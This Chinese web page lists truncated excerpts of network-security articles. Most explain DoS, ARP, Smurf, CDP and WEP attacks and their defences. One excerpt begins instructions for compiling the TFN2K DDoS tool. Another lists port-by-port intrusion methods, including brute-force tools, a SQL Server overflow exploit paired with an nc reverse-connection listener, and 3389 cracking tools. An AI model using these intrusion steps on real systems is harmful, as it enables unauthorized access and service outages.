欢迎访问 水平网    今天是:2017年11月22日 注册 | 登录 | 订阅 | 收藏
推荐文章
热点文章
专题
JQuery框架
Prototype.js
HTML5

7种DoS攻击技术方法简述说明

1.Synflood:该攻击以多个随机的源主机地址向目的主机发送SYN包,而在收到目的主机的SYN ACK后并不回应,这样,目的主机就为这些源主机建立了大量的连接队列,而且由于没有收到ACK一直维护着这些队列,造成了资源的大量消耗而不能向正常请求提供服务。2.Smurf:该攻击向一个子网的广播地址发一个带有特定请求(如ICMP回应请求)的包,并且将源地址伪装成想要攻击的主机地址。子网上所有主机都回应广播包请求而向被攻击主机发包,使该主机受到攻击。3.Land-based:攻击者将一个包的源地址和目的地址都设置为目标主机的地址,然后将该包通过IP欺骗的方式发送给被攻击主机,这种包可以造成被攻击主机因试图与自己建立连接而陷入...
类别:网络技术 - 网络安全,阅读:519,更新:2014-07-15

不要成为Smurf攻击的助手或受害者

Smurf 攻击可以是极具毁灭性的,不管是对于该攻击的目标网络或者是对帮助大量传送该攻击的网络而言都一样。 Smurf 攻击本身所使用的是一种网际网络控制讯息协议(Internet Control Message Protocol ,ICMP),对于 IP 通讯协议所内建的直接广播(broadcast)功能而言,不啻是一项重大的打击。 在这种阻断服务(Denial of Service,DoS)攻击行动中, 牵涉到的对象包括了:· 骇客· 中间者(又被称为传播者)· 受害者我们将会探讨这种网络攻击行动是如何激活的,以及你要怎样预防自己的网络成为受害者或 Smurf 攻击的传播者。Smurf 攻击是如何运作的Smurf 攻击并非很复杂,它只是一种路由递送(routing)然...
类别:网络技术 - 网络安全,阅读:529,更新:2014-07-15

监控DNS链接确保安全 DHCP也受挑战

为了防范某些类型的钓鱼攻击以及一种可以伪装成为DHCP服务器的新型特洛伊木马工具,更好地保护网络的安全,你应该考虑对DNS链接的输出流量进行监控或者过滤。约翰尼斯·乌尔里希,SNAS的首席技术官,最近就在关注一种新型恶意工具,它可以直接威胁到网络服务的安全。一旦主机被感染,这个恶意工具将在上面建立一台伪装的DHCP服务器。由于DHCP采用的是广播模式,第一个服务器回复的信息将被查询的客户端使用,这样就有可能出现工作站在延长DHCP租约时,受到来自恶意域名服务器的网络地址欺骗的情况。这种类型的木马病毒已经不是第一次出现了。实际上,它好象是Trojan.Flush.M这个影响网络流量并降低安全设定的木马...
类别:网络技术 - 网络安全,阅读:413,更新:2014-07-15

网络安全之精确定位有关ARP的攻击

杀毒就必须找到病毒的位置,这里为大家介绍精确定位有关ARP的攻击的方法。主动定位方式:因为所有的ARP攻击源都会有其特征--网卡会处于混杂模式,可以通过ARPKiller这样的工具扫描网内有哪台机器的网卡是处于混杂模式的,从而判断这台机器有可能就是“元凶”。定位好机器后,再做病毒信息收集。 标注:网卡可以置于一种模式--混杂模式,在这种模式下工作的网卡能够收到一切通过它的数据,而不管实际上数据的目的地址是不是它。这实际就是Sniffer工作的基本原理:让网卡接收一切它所能接收的数据。 被动定位方式:在局域网发生ARP攻击时,查看交换机的动态ARP表中的内容,确定攻击源的MAC地址;也可以在局域网中部署...
类别:网络技术 - 网络安全,阅读:523,更新:2014-07-15

Linux对Windows系统进行DDOS攻击的方法

首先说我们用来攻击的客户机和服务器的配置方法,使用当下最有名的REDHAT LINUX进行测试,本次攻击测试我使用的是FEDORA CORE3 ,软件用的是最有名的DDOS。废话不说了,开始设置服务器。解压 tar -zxvf tfn2k.tgz一.安装TFN2KTFN2K为开放原代码的软件,所以需要我们进行编译,这个不用说了,编译应该都会的吧,但有几个地方是必需注意的,因为使用不同版本和厂商的LINUX需要不同的设置。先修改src/ip.h注释掉以下部分,否则编译出错。 /*struct in_addr {unsigned long int s_addr;};*/然后make进行编译编译时会提示你输入服务器端进行密码设置8-32位,(攻击的时候需要输入密码)编译后会出现两个新的执行文...
类别:网络技术 - 网络安全,阅读:493,更新:2014-07-15

不做肉鸡 3389端口危险端口关闭方法

肉鸡是什么意思?肉鸡,一种植入性的电脑木马,所谓电脑肉鸡,就是拥有管理权限的远程电脑。也就是受别人控制的远程电脑3389是什么意思?3389又称Terminal Service,服务终端。在WindowsNT中最先开始使用的一种终端,在Win2K的Professional版本中不可以安装,在Server或以上版本才可以安装这个服务,其服务端口为3389。由于使用简单,方便等特点,一直受系统管理员的青昧。也正式因为他的简便,不产生交互式登陆,可以在后台操作,因此也受到了黑客朋友的喜爱,事实可以说明,现在大多数朋友在入侵之后,都想打开windows终端服务,甚至不惜重启对方的计算机,也要把终端服务安装上,由此可见他的普遍性。另,在在XP系统中又叫做&ldquo...
类别:网络技术 - 网络安全,阅读:608,更新:2014-07-15

如何增强无线网络加密功能

最糟糕的一种安全特性就是令您错误地对安全性做出乐观估计,这在安全领域中确实存在。毕竟,如果您知道某些东西不够安全,您就会采取相应的安全措施;但如果您认为某些东西已经很安全了,那么您就不大可能再去关注它了。很遗憾,无线网络加密就属于这类如安全毯一样的安全措施:让您感觉非常放心,而实际上并没有给您带来多少东西。虽然采用有线等效加密(Wired Equivalent Privacy,WEP)总比根本没有加密强,但了解其局限性也很重要,这样您才能清楚地知道您将得到什么。了解如何从 WEP 获得最大限度的安全性也同样重要。WEP 加密的工作原理  WEP 加密使用共享密钥和 RC4 加密算法。访问点(AP)和连接到该访问点的所有工...
类别:网络技术 - 网络安全,阅读:490,更新:2014-07-15

网络攻击概述 几类攻击与防御

1、服务拒绝攻击服务拒绝攻击企图通过使你的服务计算机崩溃或把它压跨来阻止你提供服务,服务拒绝攻击是最容易实施的攻击行为,主要包括:死亡之ping (ping of death)概览:由于在早期的阶段,路由器对包的最大尺寸都有限制,许多操作系统对TCP/IP栈的实现在ICMP包上都是规定64KB,并且在对包的标题头进行读取之后,要根据该标题头里包含的信息来为有效载荷生成缓冲区,当产生畸形的,声称自己的尺寸超过ICMP上限的包也就是加载的尺寸超过64K上限时,就会出现内存分配错误,导致TCP/IP堆栈崩溃,致使接受方当机。防御:现在所有的标准TCP/IP实现都已实现对付超大尺寸的包,并且大多数防火墙能够自动过滤这些攻击,包...
类别:网络技术 - 网络安全,阅读:451,更新:2014-07-15

什么是DDOS攻击及怎么抵抗DDOS攻击?

一、为何要DDOS? 随着Internet互联网络带宽的增加和多种DDOS黑客工具的不断发布,DDOS拒绝服务攻击的实施越来越容易,DDOS攻击事件正在成上升趋势。出于商业竞争、打击报复和网络敲诈等多种因素,导致很多IDC托管机房、商业站点、游戏服务器、聊天网络等网络服务商长期以来一直被DDOS攻击所困扰,随之而来的是客户投诉、同虚拟主机用户受牵连、法律纠纷、商业损失等一系列问题,因此,解决DDOS攻击问题成为网络服务商必须考虑的头等大事。 二、什么是DDOS? DDOS是英文Distributed Denial of Service的缩写,意即“分布式拒绝服务”,那么什么又是拒绝服务(Denial of Service)呢?可以这么...
类别:网络技术 - 网络安全,阅读:425,更新:2014-07-15

利用HTTP指令进行攻击之Cache篇

技术背景随着Web技术越来越广泛的应用到我们的生活,Web应用的架构的设计者和开发者不得不面对这么一个问题,那就是Web不断增长的访问量和负载,随之提升性能的相关技术应运而生,如DNS轮询、负载均衡、Cache技术等等。如果有兴趣,大家不妨对大型网站进行一下抓包,可以发现很多网站都采用了squid反向代理,通过Squid的Cache提供高速Web响应。攻击原理Cache机制不仅给服务器处理带来了很大程度的性能提升,一定程度上,也大大提升了Web服务提供商应对Get Flood的能力。用户对网站的访问,大多被分布的Cache服务器分担了,由于Cache服务器的数量以及Cache的良好处理吞吐性能,即便发生了Get Flood等攻击,此种机制也可以很好的...
类别:网络技术 - 网络安全,阅读:525,更新:2014-07-15

各个网络端口的入侵方法

1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破(字典是关键) 最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以上反向的,测试成功) sqlhelloz.exe 入侵ip 1433 (这个是正向连接) 2. 4899端口入侵 用4899过滤器.exe,扫描空口令的机器 3. 3899的入侵 对很早的机器,可以试试3389的溢出(win3389ex.exe) 对2000的机器,可以试试字典暴破。(tscrack.exe) 4. 80入侵 对sp3以前的机器,可以用webdav入侵; 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) 可以利用SQL进行注入。(啊D的注入软件...
类别:网络技术 - 网络安全,阅读:486,更新:2014-07-15

针对CDP协议攻击分析及安全防护

熟悉Cisco的朋友都知道CDP协议是思科公司独特的发现协议,在思科公司出产的所有路由器和交换机里面都能运行此协议,一台运行C D P的路由器或交换机能够得知与它直接相连的邻居端口和主机名信息。也可以得知一些附加信息如:邻居的硬件模式号码及其性能。这样通过CDP的我们能得到相关联的路由器名、路由器端口信息、IOS版本信息、IOS平台信息、硬件版本信息,以及相关的链路信息从而描述出整个网络的拓扑情况。这时候黑客就会利用CDP欺骗攻击会让网络管理员措手不及。有下面给大家说明两种目标可能遭到CDP欺骗攻击,及应对办法。一、两种CDP欺骗类型1.针对中央管理软件,各种高端网管软件Cisco works 、IBM Tivoli ...
类别:网络技术 - 网络安全,阅读:496,更新:2014-07-11